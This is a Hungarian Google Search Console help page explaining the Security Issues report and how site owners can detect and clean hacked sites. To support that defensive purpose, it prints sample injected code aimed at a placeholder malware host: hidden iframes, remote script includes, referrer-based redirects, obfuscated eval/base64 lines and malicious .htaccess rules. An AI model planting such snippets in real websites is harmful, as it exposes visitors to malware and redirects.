Biztonsági problémák jelentés

Ha a Google ellenőrzése szerint webhelyét feltörték, vagy webhelye olyan működést tanúsít, amely veszélyt jelenthet a látogatókra vagy a látogatók számítógépére nézve, akkor a Biztonsági problémák jelentésben megtalálja a Google által azonosított probléma részleteit. Kártékony működésnek minősülnek többek között az adathalász támadások, valamint a rosszindulatú és nemkívánatos programok telepítése a látogatók számítógépére.

A biztonsági problémák által érintett oldalak és webhelyek figyelmeztető jelzéssel szerepelhetnek a keresési eredmények között, és megnyitásukkor figyelmeztető oldal is megjelenhet a képernyőn.

A Biztonsági problémák jelentés megnyitása

 

Mi minősül biztonsági problémának?

A biztonsági problémák a következő kategóriákra bonthatók:

  • Feltört tartalom: Minden olyan tartalom, melyet az Ön engedélye nélkül, biztonsági réseket kihasználva helyeztek el webhelyén. Felhasználóink védelme érdekében a Google mindent megtesz, hogy feltört tartalmak ne szerepeljenek a keresési eredmények között. További információ.
  • Rosszindulatú és nemkívánatos programok: Mindazon programok, melyek arra készültek, hogy kárt tegyenek az eszközökben vagy megkárosítsák a felhasználókat; melyek félrevezető vagy nem várt működést tanúsítanak; illetve kellemetlenséget okoznak a felhasználóknak. További információ.
  • Bizalomra épülő manipuláció: Olyan tartalom, amely megtévesztő módon veszi rá a látogatókat valamilyen veszélyes tevékenységre, például bizalmas információk felfedésére vagy veszélyes szoftver letöltésére. További információ.

Honnan tudhatom, hogy biztonsági problémák vannak a webhelyemen?

Ha webhelyén biztonsági problémák találhatók, a jelentés tetején megtalálja a problémák számát.

Ha webhelye problémamentes, zöld pipát és tájékoztató üzenetet láthat.

De én csak most vettem a webhelyet!

Ha olyan webhelyet vásárolt, amelyen biztonsági problémák találhatók, javítsa ki a Biztonsági problémák jelentésben felsorolt problémákat, majd tudassa velünk felülvizsgálati kérelem útján, hogy a közelmúltban vásárolt webhelye immár megfelel a Google útmutató webmestereknek elvárásainak.

Melyek az érintett oldalak?

A problémák leírását kibontva megjelenik néhány érintett URL. A lista nem feltétlenül teljes; csak példák szerepelnek rajta, amelyeket érint a kiválasztott probléma. Előfordulhatnak olyan biztonsági problémák is, amelyekhez nem tartozik példa URL. Ez nem azt jelenti, hogy egyetlen oldalt sem érint a probléma, hanem azt, hogy valamilyen okból nem tudtunk példákat generálni.

A problémarészletek között megtalálható az első észlelés dátuma, a probléma rövid leírása, valamint egy további részleteket nyújtó link is.

Javítsa ki a problémát

Biztonsági probléma kijavítása:

  1. Bontsa ki a probléma részleteit a Biztonsági problémák jelentésben.
  2. Tekintse át a probléma leírását, majd a „További információ” feliratú linkre kattintva tájékozódjon a részletekről, és olvassa el a javításhoz szükséges lépéseket. (A „További információ” linkek azokra a leírásokra mutatnak, amelyeket ezen az oldalon, kicsit lentebb talál.)
  3. A részletek között található példaoldalak segítségével azonosítsa és oldja meg a problémát. A lista nem feltétlenül teljes; csak példák szerepelnek rajta, amelyeket érint a kiválasztott probléma. Előfordulhatnak olyan biztonsági problémák is, amelyekhez nem tartozik példa URL. Ez nem azt jelenti, hogy egyetlen oldalt sem érint a probléma, hanem azt, hogy valamilyen okból nem tudtunk példákat generálni.
  4. Oldja meg a problémát a teljes webhelyen. Ha csak néhány oldalon javítja ki a hibát, webhelye nem fog visszakerülni a keresési eredmények közé.
  5. Ha a jelentés szerint több biztonsági probléma is érinti webhelyét, oldja meg a többit is.
  6. Ellenőrizze a javításokat.
  7. Ha a jelentésben szereplő minden problémát megoldott webhelye minden oldalán, kattintson a jelentésen található Felülvizsgálat kérése gombra. Felülvizsgálati kérelmében írja le, milyen lépéseket tett. A jó kérelmek három dolgot tartalmaznak:
    • a webhelyen észlelt minőségi probléma pontos leírását;
    • a probléma megoldása érdekében tett lépések leírását;
    • a lépések eredményének dokumentációját.
  8. A felülvizsgálatok 1-2 hetet is igénybe vehetnek. Az eredményről e-mailben tájékoztatjuk. Kérelme elküldése után kapni fog egy visszaigazoló üzenetet, amelyben tájékoztatjuk, hogy a felülvizsgálat folyamatban van. Ne küldje be újra a kérelmet, mielőtt megkapja az aktuális kérelmével kapcsolatos végső döntést.

Mennyi időt vesz igénybe a felülvizsgálati kérelmem elbírálása?

Legfeljebb egy vagy két hetet. Amikor megkapjuk kérelmét, e-mailben visszaigazolást küldünk, így tudni fogja, hogy ügye folyamatban van. A felülvizsgálat befejezésekor is e-mailben értesítjük.

Kérjük, ne küldje be újra a kérelmet, mielőtt megkapná az aktuális kérelmével kapcsolatos döntést. Ha a probléma megoldása nélkül küld felülvizsgálati kérelmet, következő kérelmének elbírálása tovább tarthat, sőt, rendszerünk a visszaeső szabálysértők közé sorolhatja Önt.

Biztonsági problémák

Az alábbiakban néhány lehetséges biztonsági problémáról és kijavításuk menetéről olvashat.

Megtévesztő oldalak

Webhelyén olyan tartalom található, amely megtévesztő módon veszi rá a látogatókat valamilyen veszélyes tevékenységre, például bizalmas információk felfedésére vagy szoftver letöltésére. A Google Biztonságos Böngészés védelmet nyújt a felhasználóknak azzal, hogy figyelmeztetést jelenít meg a következetesen félrevezető tartalmakat megjelenítő oldalak megnyitása előtt.

A weboldalak a következő esetekben tekinthetők megtévesztőnek:

  • megbízható entitásnak (például saját eszközének, böngészőjének vagy adott webhelynek) tettetik vagy mutatják magukat, illetve annak tűnnek; vagy
  • olyasmire próbálják rávenni a felhasználót, amit egyébként csak valamilyen megbízható entitás kérésére tenne meg (ilyen például a jelszó közlése, a műszaki ügyfélszolgálat felhívása vagy valamilyen szoftver letöltése).

Az ilyen megtévesztést bizalomra épülő manipulációnak hívjuk. További információ a bizalomra épülő manipulációról és példák megtévesztő oldalakra.

Javítsa ki a problémát

1. Győződjön meg a probléma jelenlétéről

Keresse meg a félrevezető tartalmat a példaként felsorolt oldalakon. Az URL-ellenőrző eszközzel az oldalak mobilos és asztali változatát is megtekintheti.

2. Javítsa ki az oldalakat

Javítsa ki a bizalomra épülő manipulációt tanúsító oldalakat. Ha úgy gondolja, hogy a Biztonságos Böngészés tévesen jelez problémát, ide kattintva jelentse az esetet.

3. Kérjen felülvizsgálatot

Ha biztos benne, hogy elhárította a problémát webhelyén, kérjen biztonsági felülvizsgálatot a Biztonsági problémák jelentésen keresztül. A felülvizsgálat néhány naptól néhány hétig tarthat.

Megtévesztő beágyazott elemek

Webhelye olyan megtévesztő reklámot vagy beágyazott elemet tartalmaz, amely megtévesztő módon veszi rá a látogatókat valamilyen veszélyes tevékenységre, például bizalmas információk felfedésére vagy nemkívánatos szoftver letöltésére. Az ilyen jellegű megtévesztő tartalmak az oldalba ágyazott elemekben, például képekben, harmadik felektől származó komponensekben vagy reklámokban szerepelhetnek. A Google Biztonságos Böngészés védelmet nyújt a felhasználóknak azzal, hogy figyelmeztetést jelenít meg a következetesen félrevezető tartalmakat megjelenítő oldalak megnyitása előtt.

A tartalom látható lehet a beágyazó oldalon a felhasználók számára, de az is előfordulhat, hogy az oldal nem mutat például hirdetést, hanem előugró ablakokkal vagy más átirányításokkal juttatja a látogatókat kártékony oldalakra. Ezek a beágyazott tartalmak mindkét esetben azt jelentik, hogy a beágyazó oldal sérti az irányelveinket.

Az ilyen megtévesztést bizalomra épülő manipulációnak hívjuk. További információ a bizalomra épülő manipulációról és példák megtévesztő oldalakra.

Javítsa ki a problémát

1. Győződjön meg a probléma jelenlétéről

Keresse meg a félrevezető tartalmat a példaként felsorolt oldalakon. Győződjön meg arról, hogy webhelye oldalain egyetlen reklám, kép vagy más harmadik féltől származó beágyazott komponens sem megtévesztő jellegű. Ne feledje, hogy a hirdetési hálózatok több különböző hirdetést is megjeleníthetnek webhelye oldalain. Ezért előfordulhat, hogy néhányszor frissítenie kell az oldalt, mire megjelenik a bizalomra épülő manipulációt alkalmazó hirdetés. Előfordulhat az is, hogy bizonyos hirdetések máshogy jelennek meg a mobileszközökön, mint az asztali számítógépeken. Az URL-ellenőrző eszközzel az oldalak mobilos és asztali változatát is megtekintheti.

2. Távolítsa el a megtévesztő jellegű hirdetéseket és más elemeket

Ellenőrizze webhelye harmadik féltől származó komponenseit. Győződjön meg róla, hogy a webhelye oldalain lévő hirdetések, képek vagy beágyazott, harmadik féltől származó más erőforrásai nem megtévesztő jellegűek. Javítsa ki a bizalomra épülő manipulációt tanúsító oldalakat. 

3. Kérjen felülvizsgálatot

Ha biztos benne, hogy elhárította a problémát webhelyén, kérjen biztonsági felülvizsgálatot a Biztonsági problémák jelentésen keresztül. A felülvizsgálat néhány naptól néhány hétig tarthat.

Rosszindulatú programok
Webhelyét hackertől származó rosszindulatú program fertőzi, vagy a webhely ilyen programot tárol. Rosszindulatú programnak nevezünk minden olyan szoftvert vagy mobilalkalmazást, amelyet kifejezetten abból a célból készítettek, hogy kárt okozzon a számítógépnek, a mobileszköznek, az ezeken futó szoftvereknek vagy a felhasználónak.

1. Döntse el, hogy meg tudja-e oldani a problémát

Ha webhelyét rosszindulatú program fertőzi, a probléma elhárításához programozói tudásra és webszerver-konfiguráció terén való jártasságra is szükség lehet. Ha kevésbé tapasztalt ezen a téren, olvassa el a támogatási csapat összeállításával foglalkozó bejegyzésünket, amelyből megtudhatja, hogy milyen módon találhat segítséget.

2. Azonosítsa és hárítsa el a problémát

A rosszindulatú programoknak számos típusa létezik. A következő szakaszok a webhelyére került rosszindulatú program azonosításában és eltávolításában nyújtanak segítséget. Fontos, hogy webhelyét akár több féle kártevő is fertőzheti; alaposan vizsgálja át a webhelyet, és gondosan végezze el a tisztítást.

Kártevő típusa: Szerverkonfiguráció

Leírás

Hacker törte fel webhelyét, a webhely látogatóit pedig az Ön ártalmatlan webhelyéről átirányítja a saját, rosszindulatú programmal támadó webhelyére, valószínűleg az Ön szerveréhez tartozó konfigurációs fájl módosításával. A szerverkonfigurációs fájlok általában lehetővé teszik a webhely rendszergazdájának, hogy URL-átirányításokat adjon meg a webhely bizonyos oldalaira vagy könyvtáraira vonatkozóan. Apache szervereken ez például a .htaccess, illetve a httpd.conf fájl.

A probléma kijavítása

1. Győződjön meg a probléma jelenlétéről

Nyisson meg néhányat a Biztonsági problémák jelentésben felsorolt példa URL-ek közül.

Ne használjon böngészőt webhelye fertőzött oldalainak közvetlen megtekintéséhez.

A rosszindulatú programok gyakran a böngésző sebezhetőségeit kihasználva terjednek, ezért ha rosszindulatú programmal fertőzött oldalt nyit meg a böngészőjében, azzal károsíthatja számítógépét. Vegye figyelembe azt is, hogy a hackerek álcázási technikák segítségével elrejthetik a spam jellegű tartalmakat a webhelytulajdonosok elől.

A következő módszerekkel biztonságosabban megtekintheti számítógépén a webes tartalmakat:

  • Az URL-ellenőrző eszközzel úgy tekintheti meg az oldalt, ahogyan a Google látja. Ez azért hasznos, mert a hackerek sok esetben olyan változtatásokat eszközölnek, amelyek csak a Google számítógépei által láthatók. Például elhelyezhetnek webhelyén saját oldalaikra mutató linkeket, amelyek csak akkor jelennek meg, ha a hivatkozó a Google.
  • A cURL vagy a Wget segítségével HTTP-kéréseket (például oldallekérést) indíthat a parancssorból. Ezek az ingyenes eszközök az átirányítások diagnosztizálásában segítenek – többek között megadhat velük hivatkozót és felhasználói ügynököt jelölő információkat is. A hackerek gyakran csak bizonyos felhasználói ügynököket vagy hivatkozókat céloznak, hogy rejtve maradhassanak és jobb célpontokat választhassanak. Ezekkel az eszközökkel célpontnak álcázhatja magát. Ha kérése nem tanúsítja a spam jellegű viselkedést, próbálkozzon más hivatkozó címmel (például nagy weboldalak linkjeivel vagy egyéb keresőmotorokkal). Ha például egy olyan felhasználót személyesítene meg, aki a Google Keresés egy találatán keresztül a www.example.com/page.html címre érkezik, akkor a cURL-t a következő módon kell használnia:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Például a következő fejlécek szerepelhetnek a szerverkonfigurációs módosításokkal fertőzött oldalaktól származó válaszokban:

…
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<malware-attack-site>/index.html
< Content-Length: 253
...

2. Tisztítsa meg webhelyét a szerverkonfigurációs kártevőtől

Jelentkezzen be a szerverre shell- vagy terminál-hozzáférésen keresztül (a webhely offline is lehet, ha szeretné), és ellenőrizze a releváns szerverkonfigurációs fájlokat. Akár több feltört konfigurációs fájl is lehet webhelyén. Ellenőrizze, hogy előfordulnak-e ezekben a fájlokban nem kívánt utasítások – például átirányítások –, amelyekkel a hacker úgy konfigurálhatja a webhelyet, hogy ismeretlen, rosszindulatú programmal támadó webhelyekre irányítson át. Például az alábbihoz hasonló is szerepelhet a .htaccess fájlban:

RewriteEngine On 
RewriteCond %{HTTP_REFERER} .*google.* 
RewriteRule ^third-page.html($|/) http://<malware-site>/index.html [R=301]

 

Továbbá:

  • Mindenképp ellenőrizze a teljes fájlt, hátha a hacker a fájl végéhez adta hozzá kódját, ahol könnyebb átsiklani felette.
  • Vizsgálja meg a hacker által létrehozott potenciális cron feladatokat, amelyek arra szolgálnak, hogy folyamatosan frissítsék a .htaccess fájlt. A cron feladatok több helyen is előfordulhatnak, így például itt: /etc/crontab (lehet több /etc/cron* könyvtár is) és itt: /var/spool/cron.
  • A Feltörtek útmutatóban részletes útmutatást találhat a helyreállításhoz, többek között tisztítási lépéseket és a későbbi feltörések elkerülésének lehetőségeit is.
Kártevő típusa: SQL-injekció

Leírás

Támadó férhetett a webhely adatbázisához. Előfordulhat például, hogy a hacker automatizált módon rosszindulatú kódot illesztett valamely adatbázistábla mindegyik rekordjába, ezért amikor a szerver olyan oldalt tölt be, amelyhez a tábla adatai szükségesek, a rosszindulatú kódot is beágyazza az oldalba – és ez kárt okozhat a webhely látogatóinak.

A probléma kijavítása

1. Győződjön meg a probléma jelenlétéről

Futtasson néhány parancssori lekérdezést az érintett URL-eken, és keressen SQL-támadásra utaló nyomokat a válaszban, például „iframe” és „eval” szavakat.

Ne használjon böngészőt webhelye fertőzött oldalainak közvetlen megtekintéséhez.

A rosszindulatú programok gyakran a böngésző sebezhetőségeit kihasználva terjednek, ezért ha rosszindulatú programmal fertőzött oldalt nyit meg a böngészőjében, azzal károsíthatja számítógépét. Vegye figyelembe azt is, hogy a hackerek álcázási technikák segítségével elrejthetik a spam jellegű tartalmakat a webhelytulajdonosok elől.

A következő módszerekkel biztonságosabban megtekintheti számítógépén a webes tartalmakat:

  • Az URL-ellenőrző eszközzel úgy tekintheti meg az oldalt, ahogyan a Google látja. Ez azért hasznos, mert a hackerek sok esetben olyan változtatásokat eszközölnek, amelyek csak a Google számítógépei által láthatók. Például elhelyezhetnek webhelyén saját oldalaikra mutató linkeket, amelyek csak akkor jelennek meg, ha a hivatkozó a Google.
  • A cURL vagy a Wget segítségével HTTP-kéréseket (például oldallekérést) indíthat a parancssorból. Ezek az ingyenes eszközök az átirányítások diagnosztizálásában segítenek – többek között megadhat velük hivatkozót és felhasználói ügynököt jelölő információkat is. A hackerek gyakran csak bizonyos felhasználói ügynököket vagy hivatkozókat céloznak, hogy rejtve maradhassanak és jobb célpontokat választhassanak. Ezekkel az eszközökkel célpontnak álcázhatja magát. Ha kérése nem tanúsítja a spam jellegű viselkedést, próbálkozzon más hivatkozó címmel (például nagy weboldalak linkjeivel vagy egyéb keresőmotorokkal). Ha például egy olyan felhasználót személyesítene meg, aki a Google Keresés egy találatán keresztül a www.example.com/page.html címre érkezik, akkor a cURL-t a következő módon kell használnia:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Következő lépésként jelentkezzen be adatbázisszerverére, vagy tekintse meg adatbázisát valamilyen eszközzel, például a phpMyAdmin segítségével. Ha a Wget vagy a cURL eszközt használta, próbálja meg egyeztetni velük az oldal forráskódjában talált sérülést és a tényleges adatbázis-bejegyzéseket. Ha például azt vette észre, hogy oldalai egy veszélyes iframe-ben szerepelnek, akkor a kódban lévő iframe-t kereső SQL-lekérdezést hajthat. Például:

SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%'; 

Célszerű ellenőriznie a szerverén lévő adatbázisnaplót és a hibafájlokat is, hogy szerepel-e bennük szokatlan tevékenység, például olyan váratlan SQL-parancsok, amelyek abnormálisnak tűnnek az átlagos felhasználókhoz vagy hibákhoz képest.

2. Tisztítsa meg a webhelyét

Ha készen áll webhelye megtisztítására, frissítse a fertőzött adatbázisrekordokat, vagy állítsa vissza az adatbázist a legutóbbi érintetlen biztonsági másolatra.

Továbbá:

  • A Feltörtek útmutatóban részletes útmutatást találhat a helyreállításhoz, többek között tisztítási lépéseket és a későbbi feltörések elkerülésének lehetőségeit is.
Kártevő típusa: Kódinjekció

Leírás

A webhelyéhez tartozó oldalakat rosszindulatú kóddal egészítették ki, például kártékony webhelyet betöltő iframe elemmel.

A probléma kijavítása

1. Győződjön meg a probléma jelenlétéről

Látogassa meg a Biztonsági problémák jelentésben felsorolt fertőzött URL-eket. Keressen rosszindulatú kódot a HTML-válaszokban.

Ne használjon böngészőt webhelye fertőzött oldalainak közvetlen megtekintéséhez.

A rosszindulatú programok gyakran a böngésző sebezhetőségeit kihasználva terjednek, ezért ha rosszindulatú programmal fertőzött oldalt nyit meg a böngészőjében, azzal károsíthatja számítógépét. Vegye figyelembe azt is, hogy a hackerek álcázási technikák segítségével elrejthetik a spam jellegű tartalmakat a webhelytulajdonosok elől.

A következő módszerekkel biztonságosabban megtekintheti számítógépén a webes tartalmakat:

  • Az URL-ellenőrző eszközzel úgy tekintheti meg az oldalt, ahogyan a Google látja. Ez azért hasznos, mert a hackerek sok esetben olyan változtatásokat eszközölnek, amelyek csak a Google számítógépei által láthatók. Például elhelyezhetnek webhelyén saját oldalaikra mutató linkeket, amelyek csak akkor jelennek meg, ha a hivatkozó a Google.
  • A cURL vagy a Wget segítségével HTTP-kéréseket (például oldallekérést) indíthat a parancssorból. Ezek az ingyenes eszközök az átirányítások diagnosztizálásában segítenek – többek között megadhat velük hivatkozót és felhasználói ügynököt jelölő információkat is. A hackerek gyakran csak bizonyos felhasználói ügynököket vagy hivatkozókat céloznak, hogy rejtve maradhassanak és jobb célpontokat választhassanak. Ezekkel az eszközökkel célpontnak álcázhatja magát. Ha kérése nem tanúsítja a spam jellegű viselkedést, próbálkozzon más hivatkozó címmel (például nagy weboldalak linkjeivel vagy egyéb keresőmotorokkal). Ha például egy olyan felhasználót személyesítene meg, aki a Google Keresés egy találatán keresztül a www.example.com/page.html címre érkezik, akkor a cURL-t a következő módon kell használnia:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Íme néhány rosszindulatú kód:

  • Rosszindulatú webhelyet betöltő iframe:
    <iframe frameborder="0" height="0" src="http://<malware-site>/path/file" 
      style="display:none" width="0"></iframe>
  • JavaScript vagy más szkriptnyelv, amely támadó webhelyről hív meg és futtat szkripteket:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • A böngészőt támadó webhelyre átirányító szkript:
    <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://<malware-site>/");
      }
    </script>
  • Az észlelés elkerülése érdekében álcázott rosszindulatú kód:
    eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • Megosztott objektumfájlok, amelyek arra szolgálnak, hogy véletlenszerűen ártalmas kódot írjanak az egyébként ártalmatlan szkriptekbe:
    #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

Vizsgálja meg a webhelyen lévő összes olyan kódot, amely ártalmas lehet. Érdemes rákeresnie a gyanús szavakra, például az „iframe”-re. További hasznos kulcsszavak: script, eval, unescape. Unix-alapú rendszereken például így kereshet minden „iframe” tartalmú fájlra:

$grep -irn "iframe" ./ | less

2. Tisztítsa meg a webhelyét

Ha készen áll webhelye megtisztítására, akkor lecserélheti az érintett fájlokat a legutolsó érintetlen biztonsági másolatokra, vagy eltávolíthatja az injektált kódot az oldalakról és a kapcsolódó szkriptekből és fájlokból. Ha szerverkonfigurációs fájlokat módosított, előfordulhat, hogy újra kell indítania a webszervert a módosítások életbe léptetéséhez.

Továbbá:

  • A Feltörtek útmutatóban részletes útmutatást találhat a helyreállításhoz, többek között tisztítási lépéseket és a későbbi feltörések elkerülésének lehetőségeit is.
Kártevő típusa: Hibasablon

Leírás

A hibaüzenetekhez (pl. 404 – Nem található) használt sablont rosszindulatú programok terjesztésére konfigurálták. A támadók így olyan URL-eken indíthatnak támadást, amelyek nem is léteznek az Ön webhelyén.

A probléma kijavítása

1. Győződjön meg a probléma jelenlétéről

Kérjen olyan oldalt a webhelyéről, amely nem létezik, vagy más típusú hibát ad, és ellenőrizze, hogy a válasz más webhelyről érkezett-e, vagy más módon rosszindulatú-e.

Ne használjon böngészőt webhelye fertőzött oldalainak közvetlen megtekintéséhez.

A rosszindulatú programok gyakran a böngésző sebezhetőségeit kihasználva terjednek, ezért ha rosszindulatú programmal fertőzött oldalt nyit meg a böngészőjében, azzal károsíthatja számítógépét. Vegye figyelembe azt is, hogy a hackerek álcázási technikák segítségével elrejthetik a spam jellegű tartalmakat a webhelytulajdonosok elől.

A következő módszerekkel biztonságosabban megtekintheti számítógépén a webes tartalmakat:

  • Az URL-ellenőrző eszközzel úgy tekintheti meg az oldalt, ahogyan a Google látja. Ez azért hasznos, mert a hackerek sok esetben olyan változtatásokat eszközölnek, amelyek csak a Google számítógépei által láthatók. Például elhelyezhetnek webhelyén saját oldalaikra mutató linkeket, amelyek csak akkor jelennek meg, ha a hivatkozó a Google.
  • A cURL vagy a Wget segítségével HTTP-kéréseket (például oldallekérést) indíthat a parancssorból. Ezek az ingyenes eszközök az átirányítások diagnosztizálásában segítenek – többek között megadhat velük hivatkozót és felhasználói ügynököt jelölő információkat is. A hackerek gyakran csak bizonyos felhasználói ügynököket vagy hivatkozókat céloznak, hogy rejtve maradhassanak és jobb célpontokat választhassanak. Ezekkel az eszközökkel célpontnak álcázhatja magát. Ha kérése nem tanúsítja a spam jellegű viselkedést, próbálkozzon más hivatkozó címmel (például nagy weboldalak linkjeivel vagy egyéb keresőmotorokkal). Ha például egy olyan felhasználót személyesítene meg, aki a Google Keresés egy találatán keresztül a www.example.com/page.html címre érkezik, akkor a cURL-t a következő módon kell használnia:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

2. Tisztítsa meg a webhelyét

Jelentkezzen be a webszerverre és keressen hibaoldalakra vonatkozó utasításokat a szerverkonfigurációs fájlokban. Az Apache webszerverek hibasablonjait például a .htaccess fájlban lehet meghatározni. A következő sor egy .htaccess fájl bejegyzése, amely rosszindulatú webhelyről tölti be a 404-es hibaoldalt:

ErrorDocument 404 http://<malware-site>/index.html 

Ha készen áll webhelye megtisztítására, cserélje a .htaccess fájl(oka)t a legutóbbi érintetlen biztonsági másolatra, vagy törölje a kéretlen ErrorDocument utasításokat a meglévő .htaccess fájl(ok)ban. Ügyeljen a tényleges hibafájlok megtisztítására is (ha vannak ilyenek a webhelyen). Végül indítsa újra a webszervert, hogy meggyőződhessen arról, valamennyi módosítás életbe lépett.

Továbbá:

  • A Feltörtek útmutatóban részletes útmutatást találhat a helyreállításhoz, többek között tisztítási lépéseket és a későbbi feltörések elkerülésének lehetőségeit is.
Kártevő típusa: Webhelyközi kártevő

Leírás

Webhelye olyan más webhelyről tölt be tartalmat, amely ismerten rosszindulatú tartalmakat tárol. A Chrome-ban ezt egy közbeiktatott oldal jelzi a következő képpel:

cross-site malware warning

A probléma kijavítása​

  1. Győződjön meg a probléma jelenlétéről: navigáljon el néhány olyan oldalra, amely szerepel a Biztonsági problémák jelentés példái között. Ha tényleg webhelyközi kártevőről van szó, a fenti kép jelenik meg az oldalak megnyitásakor.
  2. A figyelmeztetés leírja, hogy milyen domainről származik a kétes tartalom. Távolítson el minden olyan referenciát, amely a figyelmeztetésben szereplő webhelyre mutat.
  3. Súlyos problémával áll szemben, ha webhelyének valamely oldala az Ön tudta nélkül jelenített meg ismert kártékony oldalról származó tartalmakat. Webhelye valószínűleg rossz kezekbe került. Javasoljuk a Segítség feltört webhelyeknek helyreállítási protokoll végrehajtását, amellyel felmérheti a károkat, valamint karanténba helyezheti és megtisztíthatja webhelyét.
  4. Miután minden olyan tartalmat eltávolított webhelyéről, amely bizalomra épülő manipulációt alkalmaz, kérjen biztonsági felülvizsgálatot a Biztonsági problémák jelentésből. A felülvizsgálat néhány naptól néhány hétig tarthat.
  5. Ha szándékosan jelenített meg tartalmat ártalmatlan webhelyről, de a webhely időközben kártékonynak minősült, és ismét nyújtani szeretné a tartalmat, amennyiben a webhelyet megtisztítják, akkor szemmel tarthatja a webhely állapotát a Google Biztonságos Böngészés hozzá tartozó diagnosztikai oldalával (http://www.google.com/safebrowsing/diagnostic?site=www.example.com). A tulajdonosok jellemzően gyorsan megtisztítják az alapvetően ártalmatlan oldalakat.
Egyéb kártevőtípusok

Webhelyére számos egyéb kártevő is bejuthatott. A Web Fundamentals című webhelyünkön további tippeket olvashat más támadások azonosításáról és elhárításáról. Ha helyreállította webhelyét, ne felejtsen felülvizsgálatot kérni.

3. Kérjen felülvizsgálatot

Ha biztos benne, hogy elhárította a problémát webhelyén, kérjen biztonsági felülvizsgálatot a Biztonsági problémák jelentésen keresztül. A felülvizsgálat néhány naptól néhány hétig tarthat.

Feltörés típusa: Kódinjekció

A webhelyhez támadó szerzett hozzáférést, aki rosszindulatú kódot juttat az oldalakra. A kód lehet például rosszindulatú webhelyre vezető átirányítás, vagy kriptobányászatot végző program, amely a fertőzött oldal bezárásáig szüntelenül fut.

1. Döntse el, hogy meg tudja-e oldani a problémát

Az Állítson össze támogatási csapatot oldalt elolvasva képet kaphat arról, hogy mi szükséges az önálló helyreállításhoz, és azt is megtudhatja, hogy miként találhat segítséget, ha túl nehéznek látja a feladatot.

2. Győződjön meg a probléma jelenlétéről

Ne használjon böngészőt webhelye fertőzött oldalainak közvetlen megtekintéséhez.

A rosszindulatú programok gyakran a böngésző sebezhetőségeit kihasználva terjednek, ezért ha rosszindulatú programmal fertőzött oldalt nyit meg a böngészőjében, azzal károsíthatja számítógépét. Vegye figyelembe azt is, hogy a hackerek álcázási technikák segítségével elrejthetik a spam jellegű tartalmakat a webhelytulajdonosok elől.

A következő módszerekkel biztonságosabban megtekintheti számítógépén a webes tartalmakat:

  • Az URL-ellenőrző eszközzel úgy tekintheti meg az oldalt, ahogyan a Google látja. Ez azért hasznos, mert a hackerek sok esetben olyan változtatásokat eszközölnek, amelyek csak a Google számítógépei által láthatók. Például elhelyezhetnek webhelyén saját oldalaikra mutató linkeket, amelyek csak akkor jelennek meg, ha a hivatkozó a Google.
  • A cURL vagy a Wget segítségével HTTP-kéréseket (például oldallekérést) indíthat a parancssorból. Ezek az ingyenes eszközök az átirányítások diagnosztizálásában segítenek – többek között megadhat velük hivatkozót és felhasználói ügynököt jelölő információkat is. A hackerek gyakran csak bizonyos felhasználói ügynököket vagy hivatkozókat céloznak, hogy rejtve maradhassanak és jobb célpontokat választhassanak. Ezekkel az eszközökkel célpontnak álcázhatja magát. Ha kérése nem tanúsítja a spam jellegű viselkedést, próbálkozzon más hivatkozó címmel (például nagy weboldalak linkjeivel vagy egyéb keresőmotorokkal). Ha például egy olyan felhasználót személyesítene meg, aki a Google Keresés egy találatán keresztül a www.example.com/page.html címre érkezik, akkor a cURL-t a következő módon kell használnia:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

A hacker beilleszthette a rosszindulatú kódot közvetlenül a webhely HTML-fájljaiba (például JavaScript-átirányításként), de a webhely tartalmát előállító fájlokban is elhelyezhette (például PHP-fájlokba).

Kérje le a jelentésben szereplő egyik fertőzött oldalt, és ellenőrizze a választ. A hackerek számos különböző módszerrel átirányíthatják a látogatókat saját webhelyükre, például:

  • Átirányítás:​
    • Fejlécátirányítások: Az ilyen átirányítások a szerverkonfigurációs fájlok módosításán alapulnak. A szerverkonfigurációs fájlok általában lehetővé teszik a webhely rendszergazdájának, hogy URL-átirányításokat adjon meg a webhely bizonyos oldalaira vagy könyvtáraira vonatkozóan. Apache szervereken ez például a .htaccess, illetve a httpd.conf fájl.
      …
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<malware-site>/index.html
      < Content-Length: 253
    • JavaScript-átirányítások:
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<malware-site>/");}
      <script>
  • Más webhelyről betöltött rosszindulatú JavaScript:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • Az észlelés elkerülése érdekében álcázott rosszindulatú kód:
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

Keressen gyanús kódszakaszokat a szerver válaszaiban és a webhelyen. Hasznos kulcsszavak a kereséshez: search, eval, base64_decode, unescape.

3. Tisztítsa meg a webhelyét

Ha készen áll webhelye megtisztítására, cserélje le az érintett fájlokat a legutóbbi érintetlen biztonsági másolatokra, vagy távolítsa el kézzel a spam jellegű tartalmakat.

Továbbá:

  • A Feltörtek útmutatóban részletes útmutatást találhat a helyreállításhoz, többek között tisztítási lépéseket és a későbbi feltörések elkerülésének lehetőségeit is.

4. Kérjen felülvizsgálatot

